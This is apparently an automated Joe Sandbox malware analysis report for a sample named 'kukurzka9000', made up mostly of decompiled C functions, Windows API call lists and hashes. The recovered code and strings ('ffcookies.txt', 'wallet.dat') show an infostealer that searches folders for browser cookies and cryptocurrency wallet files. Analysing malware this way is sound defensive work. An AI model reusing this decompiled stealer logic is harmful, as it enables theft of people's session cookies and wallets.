                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
                                                                                                                                                                          • Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550
                                                                                                                                                                        • PathCombineW.SHLWAPI(00000000,00000000,0000002E), ref: 004067B9
                                                                                                                                                                        • lstrlenW.KERNEL32 ref: 00406895
                                                                                                                                                                        • lstrlenW.KERNEL32(00000010), ref: 004068A0
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrlen$CombineFreeGlobalPath
                                                                                                                                                                        • String ID: .$\ffcookies.txt$pXet
                                                                                                                                                                        • API String ID: 1001358258-831773729
                                                                                                                                                                        • Opcode ID: d0294a9fc0581ac0fa3de42f5cfe0cf58799ffb174c14b0ebb38fbd754fd8809
                                                                                                                                                                        • Instruction ID: 20c570a6cb6be533e63ae3ac294d5736f0af275dc5b24bb95add0a5715bb0c19
                                                                                                                                                                        • Opcode Fuzzy Hash: d0294a9fc0581ac0fa3de42f5cfe0cf58799ffb174c14b0ebb38fbd754fd8809
                                                                                                                                                                        • Instruction Fuzzy Hash: D9C16FB1E00219AFDB04DFA6DD44AAEBBB5EB88310F104839F915B7391DB745D11CBA8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 25%
                                                                                                                                                                        			E0040B177(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                                                                        				char _v576;
                                                                                                                                                                        				char _v584;
                                                                                                                                                                        				char _v616;
                                                                                                                                                                        				signed char _v620;
                                                                                                                                                                        				intOrPtr _v632;
                                                                                                                                                                        				intOrPtr _v640;
                                                                                                                                                                        				void* _v648;
                                                                                                                                                                        				void* _v668;
                                                                                                                                                                        				void* _v672;
                                                                                                                                                                        				intOrPtr _v692;
                                                                                                                                                                        				void* _v696;
                                                                                                                                                                        				WCHAR* _v704;
                                                                                                                                                                        				void* _v724;
                                                                                                                                                                        				void* _v740;
                                                                                                                                                                        				intOrPtr _v756;
                                                                                                                                                                        				intOrPtr _v768;
                                                                                                                                                                        				char _v772;
                                                                                                                                                                        				intOrPtr _v780;
                                                                                                                                                                        				intOrPtr _v788;
                                                                                                                                                                        				intOrPtr _v796;
                                                                                                                                                                        				signed int _v808;
                                                                                                                                                                        				void* _v812;
                                                                                                                                                                        				void* _v820;
                                                                                                                                                                        				void* _v824;
                                                                                                                                                                        				void* _v828;
                                                                                                                                                                        				void* _v832;
                                                                                                                                                                        				void* _v836;
                                                                                                                                                                        				void* _v844;
                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				void* _t66;
                                                                                                                                                                        				void* _t70;
                                                                                                                                                                        				void* _t78;
                                                                                                                                                                        				void* _t86;
                                                                                                                                                                        				void* _t89;
                                                                                                                                                                        				void* _t96;
                                                                                                                                                                        				void* _t98;
                                                                                                                                                                        				void* _t99;
                                                                                                                                                                        				void* _t100;
                                                                                                                                                                        				void* _t102;
                                                                                                                                                                        				intOrPtr _t103;
                                                                                                                                                                        				void* _t116;
                                                                                                                                                                        				void* _t117;
                                                                                                                                                                        				void* _t127;
                                                                                                                                                                        				intOrPtr _t128;
                                                                                                                                                                        				void* _t130;
                                                                                                                                                                        				WCHAR* _t132;
                                                                                                                                                                        				intOrPtr _t172;
                                                                                                                                                                        				intOrPtr _t173;
                                                                                                                                                                        				intOrPtr _t177;
                                                                                                                                                                        				void* _t182;
                                                                                                                                                                        				intOrPtr _t183;
                                                                                                                                                                        				void* _t185;
                                                                                                                                                                        				void* _t189;
                                                                                                                                                                        				signed int _t190;
                                                                                                                                                                        				void* _t192;
                                                                                                                                                                        				void* _t194;
                                                                                                                                                                        				signed int _t196;
                                                                                                                                                                        				void* _t198;
                                                                                                                                                                        
                                                                                                                                                                        				_t198 = (_t196 & 0xfffffff8) - 0x28c;
                                                                                                                                                                        				_t183 = __edx;
                                                                                                                                                                        				_t190 = __ecx;
                                                                                                                                                                        				_v640 = __edx;
                                                                                                                                                                        				_v648 = __ecx;
                                                                                                                                                                        				_t66 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a, _t182, _t189, _t127);
                                                                                                                                                                        				_t128 =  *((intOrPtr*)( *0x40e13c))(_t66, _a4);
                                                                                                                                                                        				_v632 = _t128;
                                                                                                                                                                        				E0040188C(_t128, _t128, 0x104, __ecx,  *0x40e1d0);
                                                                                                                                                                        				_t70 =  *((intOrPtr*)( *0x40e018))(_t128,  &_v616);
                                                                                                                                                                        				_v672 = _t70;
                                                                                                                                                                        				if(_t70 == 0xffffffff) {
                                                                                                                                                                        					L21:
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t130 = _t70;
                                                                                                                                                                        				do {
                                                                                                                                                                        					if((_v620 & 0x00000010) == 0) {
                                                                                                                                                                        						if(E0040A70E( &_v576, _a8) == 0 || E0040A70E( &_v576, _a12) != 0) {
                                                                                                                                                                        							goto L19;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t86 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
                                                                                                                                                                        							_t185 =  *((intOrPtr*)( *0x40e000))(_t86, _a4,  &_v584);
                                                                                                                                                                        							_v668 = _t185;
                                                                                                                                                                        							_v704 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
                                                                                                                                                                        							_t89 = E0040A69E( *0x40e044,  &_v704);
                                                                                                                                                                        							_t132 = _v704;
                                                                                                                                                                        							if(_t89 == 0) {
                                                                                                                                                                        								L17:
                                                                                                                                                                        								LocalFree(_t132);
                                                                                                                                                                        								LocalFree(_t185);
                                                                                                                                                                        								DeleteFileW(_t132);
                                                                                                                                                                        								L18:
                                                                                                                                                                        								_t130 = _v696;
                                                                                                                                                                        								_t183 = _v692;
                                                                                                                                                                        								goto L19;
                                                                                                                                                                        							}
                                                                                                                                                                        							_push(0);
                                                                                                                                                                        							_push(_t132);
                                                                                                                                                                        							_push(_t185);
                                                                                                                                                                        							if( *((intOrPtr*)( *0x40e184))() == 0) {
                                                                                                                                                                        								goto L17;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t96 =  *((intOrPtr*)( *0x40e03c))(_t132, 0x80000000, 1, 0, 4, 0, 0);
                                                                                                                                                                        							_v724 = _t96;
                                                                                                                                                                        							GetFileSize(_t96, 0);
                                                                                                                                                                        							_t98 =  *((intOrPtr*)( *0x40e044))(0x40, 0x618);
                                                                                                                                                                        							_t99 =  *((intOrPtr*)( *0x40e13c))(_t98,  *0x40e1b8);
                                                                                                                                                                        							_t172 =  *0x40e1b4; // 0x62de88
                                                                                                                                                                        							_t100 = E0040A503(_t99, _t172);
                                                                                                                                                                        							_t173 =  *0x40e1b8; // 0x658718
                                                                                                                                                                        							_t102 = E0040A503(E0040A503(_t100, _t173), _t190);
                                                                                                                                                                        							_t103 =  *((intOrPtr*)( *0x40e044))(0x40, 0x618);
                                                                                                                                                                        							_v768 = _t103;
                                                                                                                                                                        							E0040A2AA(_t185 +  *((intOrPtr*)( *0x40e08c))(0) * 2,  &_v772, _v756);
                                                                                                                                                                        							_t194 = E0040A503(_t102, _v772);
                                                                                                                                                                        							_v740 = _t194;
                                                                                                                                                                        							 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t194, 0xffffffff, 0, 0, 0, 0);
                                                                                                                                                                        							_v780 = 0;
                                                                                                                                                                        							 *((intOrPtr*)( *0x40e044))(0x40, 0x144);
                                                                                                                                                                        							_t177 = _v788;
                                                                                                                                                                        							_v796 = 0;
                                                                                                                                                                        							if(_t177 == 0) {
                                                                                                                                                                        								L16:
                                                                                                                                                                        								LocalFree(_t132);
                                                                                                                                                                        								LocalFree(_t194);
                                                                                                                                                                        								LocalFree(_v812);
                                                                                                                                                                        								LocalFree(_t185);
                                                                                                                                                                        								L14:
                                                                                                                                                                        								_t190 = _v808;
                                                                                                                                                                        								goto L18;
                                                                                                                                                                        							}
                                                                                                                                                                        							 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t194, 0xffffffff, 0, _t177, 0, 0);
                                                                                                                                                                        							if(0 != 0) {
                                                                                                                                                                        								_t116 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
                                                                                                                                                                        								_v812 = _v836;
                                                                                                                                                                        								_v808 = _v832;
                                                                                                                                                                        								_t117 =  *((intOrPtr*)( *0x40e13c))(_t116, _t132);
                                                                                                                                                                        								_t160 = _a20;
                                                                                                                                                                        								_v808 = _v808 & 0x00000000;
                                                                                                                                                                        								_v812 = _t117;
                                                                                                                                                                        								 *_t160 =  *_a20 + 1;
                                                                                                                                                                        								asm("movsd");
                                                                                                                                                                        								asm("movsd");
                                                                                                                                                                        								asm("movsd");
                                                                                                                                                                        								asm("movsd");
                                                                                                                                                                        								_t185 = _v832;
                                                                                                                                                                        								_t194 = _v828;
                                                                                                                                                                        								goto L16;
                                                                                                                                                                        							}
                                                                                                                                                                        							LocalFree(_t194);
                                                                                                                                                                        							LocalFree(_v828);
                                                                                                                                                                        							LocalFree(_v844);
                                                                                                                                                                        							LocalFree(_t132);
                                                                                                                                                                        							LocalFree(_t185);
                                                                                                                                                                        							CloseHandle(_v824);
                                                                                                                                                                        							DeleteFileW(_t132);
                                                                                                                                                                        							goto L14;
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					if(_v576 != 0x2e && E0040A70E( &_v576, _a8) != 0 && E0040A70E( &_v576, _a12) == 0) {
                                                                                                                                                                        						_t78 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
                                                                                                                                                                        						_t192 =  *((intOrPtr*)( *0x40e000))(_t78, _a4,  &_v584);
                                                                                                                                                                        						E0040B177(_v692, _t183, _t192, _a8, _a12, _a16, _a20);
                                                                                                                                                                        						_t198 = _t198 + 0x14;
                                                                                                                                                                        						LocalFree(_t192);
                                                                                                                                                                        						_t190 = _v692;
                                                                                                                                                                        					}
                                                                                                                                                                        					L19:
                                                                                                                                                                        					_push( &_v620);
                                                                                                                                                                        					_push(_t130);
                                                                                                                                                                        				} while ( *((intOrPtr*)( *0x40e148))() != 0);
                                                                                                                                                                        				LocalFree(_v648);
                                                                                                                                                                        				FindClose(_t130);
                                                                                                                                                                        				goto L21;
                                                                                                                                                                        			}






























































                                                                                                                                                                        0x0040b17d
                                                                                                                                                                        0x0040b190
                                                                                                                                                                        0x0040b192
                                                                                                                                                                        0x0040b196
                                                                                                                                                                        0x0040b19a
                                                                                                                                                                        0x0040b19e
                                                                                                                                                                        0x0040b1b2
                                                                                                                                                                        0x0040b1bb
                                                                                                                                                                        0x0040b1bf
                                                                                                                                                                        0x0040b1d0
                                                                                                                                                                        0x0040b1d2
                                                                                                                                                                        0x0040b1d9
                                                                                                                                                                        0x0040b4e6
                                                                                                                                                                        0x0040b4ee
                                                                                                                                                                        0x0040b4ee
                                                                                                                                                                        0x0040b1df
                                                                                                                                                                        0x0040b1e1
                                                                                                                                                                        0x0040b1e6
                                                                                                                                                                        0x0040b27a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b294
                                                                                                                                                                        0x0040b2a1
                                                                                                                                                                        0x0040b2ba
                                                                                                                                                                        0x0040b2bf
                                                                                                                                                                        0x0040b2c9
                                                                                                                                                                        0x0040b2cd
                                                                                                                                                                        0x0040b2d2
                                                                                                                                                                        0x0040b2d8
                                                                                                                                                                        0x0040b4a3
                                                                                                                                                                        0x0040b4a4
                                                                                                                                                                        0x0040b4ab
                                                                                                                                                                        0x0040b4b2
                                                                                                                                                                        0x0040b4b8
                                                                                                                                                                        0x0040b4b8
                                                                                                                                                                        0x0040b4bc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b4bc
                                                                                                                                                                        0x0040b2e3
                                                                                                                                                                        0x0040b2e5
                                                                                                                                                                        0x0040b2e6
                                                                                                                                                                        0x0040b2eb
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b305
                                                                                                                                                                        0x0040b30a
                                                                                                                                                                        0x0040b30e
                                                                                                                                                                        0x0040b321
                                                                                                                                                                        0x0040b330
                                                                                                                                                                        0x0040b332
                                                                                                                                                                        0x0040b33a
                                                                                                                                                                        0x0040b33f
                                                                                                                                                                        0x0040b350
                                                                                                                                                                        0x0040b364
                                                                                                                                                                        0x0040b372
                                                                                                                                                                        0x0040b37f
                                                                                                                                                                        0x0040b396
                                                                                                                                                                        0x0040b39a
                                                                                                                                                                        0x0040b3ab
                                                                                                                                                                        0x0040b3ba
                                                                                                                                                                        0x0040b3be
                                                                                                                                                                        0x0040b3c0
                                                                                                                                                                        0x0040b3c4
                                                                                                                                                                        0x0040b3ca
                                                                                                                                                                        0x0040b482
                                                                                                                                                                        0x0040b483
                                                                                                                                                                        0x0040b48a
                                                                                                                                                                        0x0040b494
                                                                                                                                                                        0x0040b49b
                                                                                                                                                                        0x0040b428
                                                                                                                                                                        0x0040b428
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b428
                                                                                                                                                                        0x0040b3e6
                                                                                                                                                                        0x0040b3ea
                                                                                                                                                                        0x0040b43d
                                                                                                                                                                        0x0040b44a
                                                                                                                                                                        0x0040b453
                                                                                                                                                                        0x0040b457
                                                                                                                                                                        0x0040b459
                                                                                                                                                                        0x0040b460
                                                                                                                                                                        0x0040b465
                                                                                                                                                                        0x0040b474
                                                                                                                                                                        0x0040b476
                                                                                                                                                                        0x0040b477
                                                                                                                                                                        0x0040b478
                                                                                                                                                                        0x0040b479
                                                                                                                                                                        0x0040b47a
                                                                                                                                                                        0x0040b47e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b47e
                                                                                                                                                                        0x0040b3ed
                                                                                                                                                                        0x0040b3f8
                                                                                                                                                                        0x0040b402
                                                                                                                                                                        0x0040b409
                                                                                                                                                                        0x0040b410
                                                                                                                                                                        0x0040b41b
                                                                                                                                                                        0x0040b422
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b422
                                                                                                                                                                        0x0040b27a
                                                                                                                                                                        0x0040b1f2
                                                                                                                                                                        0x0040b22c
                                                                                                                                                                        0x0040b246
                                                                                                                                                                        0x0040b254
                                                                                                                                                                        0x0040b259
                                                                                                                                                                        0x0040b25d
                                                                                                                                                                        0x0040b263
                                                                                                                                                                        0x0040b263
                                                                                                                                                                        0x0040b4c0
                                                                                                                                                                        0x0040b4c9
                                                                                                                                                                        0x0040b4ca
                                                                                                                                                                        0x0040b4cd
                                                                                                                                                                        0x0040b4d9
                                                                                                                                                                        0x0040b4e0
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0040B30E
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0040B3ED
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0040B3F8
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0040B402
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0040B409
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0040B410
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0040B41B
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 0040B422
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0040B483
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0040B48A
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0040B494
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0040B49B
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0040B4A4
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0040B4AB
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 0040B4B2
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0040B4D9
                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040B4E0
                                                                                                                                                                          • Part of subcall function 0040A70E: LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A741
                                                                                                                                                                          • Part of subcall function 0040A70E: LocalFree.KERNEL32(?), ref: 0040A7C2
                                                                                                                                                                          • Part of subcall function 0040B177: LocalFree.KERNEL32(00000000), ref: 0040B25D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Local$Free$File$CloseDelete$AllocFindHandleSize
                                                                                                                                                                        • String ID: .$pXet
                                                                                                                                                                        • API String ID: 3415656112-4267161970
                                                                                                                                                                        • Opcode ID: ef89599a16f3060e6f46494271e3fa6c667b3084db2f4bc1dda9137fff215fc9
                                                                                                                                                                        • Instruction ID: d7038f412777c1620d74c121b4857271da971a97c01f51cff95b18f8f793f09e
                                                                                                                                                                        • Opcode Fuzzy Hash: ef89599a16f3060e6f46494271e3fa6c667b3084db2f4bc1dda9137fff215fc9
                                                                                                                                                                        • Instruction Fuzzy Hash: A5A1B171204301AFD704DF62DD88E6B77A9EF88704F004D29FA55A72A1DB74ED10CBAA
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 0040AE4E
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0040AEA9
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0040AEB0
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$FolderPathSpecial
                                                                                                                                                                        • String ID: pXet$wallet.dat
                                                                                                                                                                        • API String ID: 1941890384-587282372
                                                                                                                                                                        • Opcode ID: cc52245ba0c1cf8e38b16e73aee8d7de3582cbf4d55e3452c4d46f73041d1e99
                                                                                                                                                                        • Instruction ID: c428bda3d7e2fbc090b10557d15fab42b18105d23257a4f21a5ceef78d5d1267
                                                                                                                                                                        • Opcode Fuzzy Hash: cc52245ba0c1cf8e38b16e73aee8d7de3582cbf4d55e3452c4d46f73041d1e99
                                                                                                                                                                        • Instruction Fuzzy Hash: 4BA1B471A00215AFDB14DBA6DD89FAF77B5EB48310F004429F615BB2D0DBB89D10CBA9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 41%
                                                                                                                                                                        			E00403C8F(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a12) {
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				void* _v20;
                                                                                                                                                                        				void* _v24;
                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                        				void* _v32;
                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                        				void* _v40;
                                                                                                                                                                        				void* _v44;
                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                        				char _v596;
                                                                                                                                                                        				signed int _v640;
                                                                                                                                                                        				void* _t60;
                                                                                                                                                                        				void* _t62;
                                                                                                                                                                        				void* _t63;
                                                                                                                                                                        				void* _t66;
                                                                                                                                                                        				void* _t70;
                                                                                                                                                                        				signed int _t77;
                                                                                                                                                                        				signed int _t86;
                                                                                                                                                                        				signed int _t91;
                                                                                                                                                                        				void* _t93;
                                                                                                                                                                        				void* _t94;
                                                                                                                                                                        				void* _t96;
                                                                                                                                                                        				void* _t97;
                                                                                                                                                                        				signed int _t101;
                                                                                                                                                                        				signed int _t103;
                                                                                                                                                                        				void* _t105;
                                                                                                                                                                        				void* _t107;
                                                                                                                                                                        				void* _t109;
                                                                                                                                                                        				void* _t111;
                                                                                                                                                                        				signed int _t123;
                                                                                                                                                                        				void* _t124;
                                                                                                                                                                        				void* _t125;
                                                                                                                                                                        				void* _t127;
                                                                                                                                                                        				signed int _t160;
                                                                                                                                                                        				intOrPtr _t173;
                                                                                                                                                                        				void* _t181;
                                                                                                                                                                        				void* _t186;
                                                                                                                                                                        				signed int _t189;
                                                                                                                                                                        				void* _t191;
                                                                                                                                                                        				void* _t192;
                                                                                                                                                                        				void* _t193;
                                                                                                                                                                        				void* _t194;
                                                                                                                                                                        
                                                                                                                                                                        				_v36 = __edx;
                                                                                                                                                                        				_v28 = __ecx;
                                                                                                                                                                        				_t60 =  *((intOrPtr*)( *0x40e18c))(__ecx,  *0x40e1a8);
                                                                                                                                                                        				while(1) {
                                                                                                                                                                        					_t124 = _t60;
                                                                                                                                                                        					if(_t124 == 0) {
                                                                                                                                                                        						break;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t125 = _t124 + 8;
                                                                                                                                                                        					_t62 =  *((intOrPtr*)( *0x40e18c))(_t125,  *0x40e1f0);
                                                                                                                                                                        					_t3 = _t62 + 2; // 0x2
                                                                                                                                                                        					_t63 =  *((intOrPtr*)( *0x40e18c))(_t3,  *0x40e1e8);
                                                                                                                                                                        					_v24 = _t63;
                                                                                                                                                                        					_t66 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t64);
                                                                                                                                                                        					_v12 = _t66;
                                                                                                                                                                        					_t70 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t68);
                                                                                                                                                                        					_v16 = _t70;
                                                                                                                                                                        					_t186 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t71);
                                                                                                                                                                        					_v20 = _t186;
                                                                                                                                                                        					_v32 = _v24 - _t125 >> 1;
                                                                                                                                                                        					_t77 = E0040A3E4(_t125,  &_v12, _t3 - _t125 >> 1, _v24 - _t125 >> 1);
                                                                                                                                                                        					__eflags = _t77;
                                                                                                                                                                        					if(_t77 == 0) {
                                                                                                                                                                        						LocalFree(_v12);
                                                                                                                                                                        						LocalFree(_v16);
                                                                                                                                                                        						LocalFree(_t186);
                                                                                                                                                                        						L16:
                                                                                                                                                                        						L17:
                                                                                                                                                                        						return 1;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t181 =  *((intOrPtr*)( *0x40e18c))(_v24 + 2,  *0x40e1e8);
                                                                                                                                                                        					_t189 = _t181 - _t125 >> 1;
                                                                                                                                                                        					_t86 = E0040A3E4(_t125,  &_v16, _v32 + 1, _t189);
                                                                                                                                                                        					__eflags = _t86;
                                                                                                                                                                        					if(_t86 == 0) {
                                                                                                                                                                        						L14:
                                                                                                                                                                        						LocalFree(_v12);
                                                                                                                                                                        						LocalFree(_v16);
                                                                                                                                                                        						LocalFree(_v20);
                                                                                                                                                                        						goto L16;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t17 = _t181 + 2; // 0x2
                                                                                                                                                                        					_v48 =  *((intOrPtr*)( *0x40e18c))(_t17,  *0x40e228);
                                                                                                                                                                        					_t20 = _t189 + 1; // 0x1
                                                                                                                                                                        					_t91 = E0040A3E4(_t125,  &_v20, _t20, _t90 - _t125 >> 1);
                                                                                                                                                                        					__eflags = _t91;
                                                                                                                                                                        					if(_t91 == 0) {
                                                                                                                                                                        						goto L14;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t93 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        					_t94 =  *((intOrPtr*)( *0x40e000))(_t93, _a12, _v20);
                                                                                                                                                                        					_v24 = _t94;
                                                                                                                                                                        					_t96 = E0040A503( *((intOrPtr*)( *0x40e044))(0x40, 0x208), _t94);
                                                                                                                                                                        					_t173 =  *0x40e1d0; // 0x658898
                                                                                                                                                                        					_t97 = E0040A503(_t96, _t173);
                                                                                                                                                                        					_v44 = _t97;
                                                                                                                                                                        					_t127 =  *((intOrPtr*)( *0x40e018))(_t97,  &_v640);
                                                                                                                                                                        					_v40 = _t127;
                                                                                                                                                                        					__eflags = _t127 - 0xffffffff;
                                                                                                                                                                        					if(_t127 == 0xffffffff) {
                                                                                                                                                                        						return 0;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						goto L5;
                                                                                                                                                                        					}
                                                                                                                                                                        					do {
                                                                                                                                                                        						L5:
                                                                                                                                                                        						__eflags = _v640 & 0x00000010;
                                                                                                                                                                        						if((_v640 & 0x00000010) != 0) {
                                                                                                                                                                        							__eflags = _v596 - 0x2e;
                                                                                                                                                                        							if(_v596 != 0x2e) {
                                                                                                                                                                        								_t103 =  *((intOrPtr*)( *0x40e18c))( &_v596, _v12);
                                                                                                                                                                        								__eflags = _t103;
                                                                                                                                                                        								if(_t103 != 0) {
                                                                                                                                                                        									_t105 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
                                                                                                                                                                        									_t191 =  *((intOrPtr*)( *0x40e13c))(_t105, _a12);
                                                                                                                                                                        									_v32 = _t191;
                                                                                                                                                                        									_t107 =  *((intOrPtr*)( *0x40e0e0))(_t191, 0, 0x5c);
                                                                                                                                                                        									_t35 = _t107 + 2; // 0x2
                                                                                                                                                                        									_t160 = _t35 - _t191;
                                                                                                                                                                        									__eflags = _t160;
                                                                                                                                                                        									 *((short*)(_t191 + (_t160 >> 1) * 2 - 0x16)) = 0;
                                                                                                                                                                        									_t109 =  *((intOrPtr*)( *0x40e0e0))(_t191, 0, 0x5c);
                                                                                                                                                                        									_t39 = _t109 + 2; // 0x2
                                                                                                                                                                        									 *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        									_t192 = _v24;
                                                                                                                                                                        									_t111 = E0040A503(0, _t192);
                                                                                                                                                                        									_t193 =  *((intOrPtr*)( *0x40e000))(_t111, _t192,  &_v596);
                                                                                                                                                                        									E004039D7(_t193, _v16, __eflags, _t39, _t35, _v36, _a4);
                                                                                                                                                                        									_t194 = _t194 + 0x10;
                                                                                                                                                                        									LocalFree(_t193);
                                                                                                                                                                        									LocalFree(_v32);
                                                                                                                                                                        									_t127 = _v40;
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						_t101 =  *((intOrPtr*)( *0x40e148))(_t127,  &_v640);
                                                                                                                                                                        						__eflags = _t101;
                                                                                                                                                                        					} while (_t101 != 0);
                                                                                                                                                                        					FindClose(_t127);
                                                                                                                                                                        					LocalFree(_v12);
                                                                                                                                                                        					LocalFree(_v16);
                                                                                                                                                                        					LocalFree(_v20);
                                                                                                                                                                        					LocalFree(_v24);
                                                                                                                                                                        					LocalFree(_v44);
                                                                                                                                                                        					_t123 = _v48 + 2;
                                                                                                                                                                        					__eflags = _t123;
                                                                                                                                                                        					_t60 =  *((intOrPtr*)( *0x40e18c))(_t123,  *0x40e1a8);
                                                                                                                                                                        				}
                                                                                                                                                                        				goto L17;
                                                                                                                                                                        			}














































                                                                                                                                                                        0x00403ca6
                                                                                                                                                                        0x00403caa
                                                                                                                                                                        0x00403cad
                                                                                                                                                                        0x00403f55
                                                                                                                                                                        0x00403f55
                                                                                                                                                                        0x00403f59
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403cbf
                                                                                                                                                                        0x00403cc3
                                                                                                                                                                        0x00403cd1
                                                                                                                                                                        0x00403cd5
                                                                                                                                                                        0x00403ce6
                                                                                                                                                                        0x00403cf0
                                                                                                                                                                        0x00403cfb
                                                                                                                                                                        0x00403d0a
                                                                                                                                                                        0x00403d1b
                                                                                                                                                                        0x00403d27
                                                                                                                                                                        0x00403d3b
                                                                                                                                                                        0x00403d3e
                                                                                                                                                                        0x00403d41
                                                                                                                                                                        0x00403d48
                                                                                                                                                                        0x00403d4a
                                                                                                                                                                        0x00403f7f
                                                                                                                                                                        0x00403f88
                                                                                                                                                                        0x00403f8f
                                                                                                                                                                        0x00403f8f
                                                                                                                                                                        0x00403f95
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403f97
                                                                                                                                                                        0x00403d6b
                                                                                                                                                                        0x00403d71
                                                                                                                                                                        0x00403d78
                                                                                                                                                                        0x00403d7f
                                                                                                                                                                        0x00403d81
                                                                                                                                                                        0x00403f65
                                                                                                                                                                        0x00403f68
                                                                                                                                                                        0x00403f71
                                                                                                                                                                        0x00403f8f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403f8f
                                                                                                                                                                        0x00403d93
